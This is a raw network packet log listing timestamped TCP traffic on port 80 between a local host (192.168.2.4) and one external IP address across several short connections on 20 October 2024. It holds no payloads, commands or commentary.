Oct 20, 2024 22:48:01.281016111 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:02.824836969 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.679847956 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.679933071 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.680000067 CEST	49776	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.685009956 CEST	80	49776	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.784018040 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.789007902 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.789084911 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.789206028 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.789302111 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794095993 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794147968 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794159889 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794260979 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794266939 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794312954 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794316053 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794344902 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794384003 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794411898 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794415951 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794460058 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794469118 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794502020 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794533968 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794559956 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794624090 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794651031 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.794686079 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.794723988 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.799221039 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.799248934 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.799293041 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.799448013 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.799477100 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.799525976 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.799525976 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.799554110 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.799588919 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.799617052 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.841206074 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:03.841470957 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:03.889720917 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:04.435242891 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:05.311197042 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:05.311423063 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:05.316972017 CEST	80	49787	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:05.317034006 CEST	49787	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.534293890 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.539918900 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.540002108 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.540175915 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.540247917 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545257092 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545289040 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545317888 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545324087 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545347929 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545365095 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545368910 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545398951 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545419931 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545425892 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545448065 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545459032 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545480967 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545488119 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.545499086 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545536995 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:06.545571089 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.550050020 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.550456047 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.550508022 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.550534964 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.550561905 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.550611019 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.550637960 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:06.593030930 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.858602047 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.858828068 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.858885050 CEST	49798	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.863800049 CEST	80	49798	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.971584082 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.976564884 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.976655960 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.976784945 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.976839066 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.981580973 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.981681108 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.981693029 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.981729031 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.981834888 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.981864929 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.981893063 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.981909037 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.981925964 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.981939077 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.981960058 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.981987000 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.981992960 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.982022047 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.982045889 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.982067108 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.982080936 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:07.982094049 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.986583948 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.986612082 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.986638069 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.987032890 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.987061024 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:07.987090111 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:08.029021025 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.313683987 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.313855886 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.313916922 CEST	49808	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.318830967 CEST	80	49808	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.424756050 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.429888010 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.430022001 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.430140972 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.430200100 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.434966087 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435049057 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435117006 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435146093 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435172081 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435203075 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435204029 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435231924 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435246944 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435275078 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435283899 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435312986 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435328007 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435357094 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435340881 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.435401917 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:09.435405016 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.439714909 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.440560102 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.440588951 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.440640926 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.440669060 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.440696955 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.440727949 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:09.482589006 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.727302074 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.727401018 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.727459908 CEST	49815	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.732280970 CEST	80	49815	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.830971956 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.837055922 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.837162018 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.837290049 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.837343931 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.842144012 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842210054 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.842286110 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842330933 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842353106 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.842365026 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842386961 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.842396021 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842446089 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842449903 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.842478991 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842540979 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.842547894 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.842605114 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:10.842614889 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847029924 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847316027 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847516060 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847546101 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847604990 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847632885 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847660065 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.847747087 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:10.888933897 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.284804106 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.284874916 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.284921885 CEST	49822	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.289938927 CEST	80	49822	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.393382072 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.398794889 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.398894072 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.399019003 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.399075985 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.404299974 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.404330969 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.404364109 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.404366016 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.404400110 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.404416084 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.404598951 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.404649973 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.405132055 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.405159950 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.405194044 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.405213118 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.405262947 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.405289888 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.405317068 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.405318975 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.405333042 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:12.405345917 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.411835909 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.411886930 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.412149906 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.412362099 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.412471056 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.412785053 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.412811995 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:12.456947088 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.801394939 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.801472902 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.801541090 CEST	49833	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.806344032 CEST	80	49833	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.909322023 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.914289951 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.915608883 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.915754080 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.915841103 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.920793056 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.920826912 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.920857906 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.920885086 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.920902014 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.920939922 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.920944929 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.920990944 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.920998096 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.921020031 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.921052933 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.921081066 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.921082973 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.921118975 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:13.925281048 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.926009893 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.926064014 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.926091909 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.926120043 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.926172018 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.926199913 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:13.972925901 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.228899956 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.228986025 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.229079008 CEST	49840	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.233967066 CEST	80	49840	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.331090927 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.336482048 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.336600065 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.336762905 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.336852074 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.341976881 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342008114 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342036963 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342036963 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.342065096 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.342067003 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342096090 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342114925 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.342127085 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342155933 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342179060 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.342205048 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.342210054 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342238903 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.342268944 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:15.346806049 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.347138882 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.347439051 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.347467899 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.347496033 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.347523928 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.347553015 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:15.389091015 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.674175024 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.674355030 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.674448967 CEST	49847	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.679328918 CEST	80	49847	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.784219980 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.789175034 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.789316893 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.789419889 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.789491892 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794493914 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794523954 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794555902 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794583082 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794621944 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794651031 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794672966 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794678926 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794699907 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794708014 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794727087 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794737101 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794759035 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794787884 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.794790030 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794841051 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:16.794858932 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.795325041 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.800172091 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.800199986 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.800226927 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.800255060 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.800286055 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.800417900 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:16.841072083 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.128853083 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.128906012 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.128963947 CEST	49854	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.133836031 CEST	80	49854	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.289683104 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.294780970 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.294929028 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.296349049 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.296432972 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.301398993 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301429033 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301472902 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.301484108 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301503897 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.301528931 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301538944 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.301558018 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301584959 CEST	80	49866	193.46.218.44	192.168.2.4
Oct 20, 2024 22:48:18.301585913 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.301644087 CEST	49866	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:48:18.301650047 CEST	80	49866	193.46.218.44	192.168.2.4
